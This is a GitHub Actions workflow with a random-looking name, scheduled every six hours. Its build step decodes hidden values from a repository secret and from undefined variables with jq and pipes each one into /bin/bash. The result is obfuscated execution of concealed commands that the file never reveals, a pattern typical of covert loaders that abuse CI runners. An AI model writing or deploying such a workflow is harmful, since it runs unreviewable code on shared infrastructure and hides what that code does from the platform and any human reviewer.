name: inboardstingy
on:
  workflow_dispatch:
  schedule:
    - cron: '20 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: inboardstingy
        env:
          sr1: ${{ secrets.sr1 }}
        run: |
          echo $sr1 | jq -r .c458 | /bin/bash
          echo $cm432 | jq -r .mb2 | /bin/bash
          echo $ncwo21494 | jq -r .bvb36565 | /bin/bash
          echo $nl55403 | jq -r .h8057 | /bin/bash
          echo $ekc1 | jq -r .qk06463 | /bin/bash

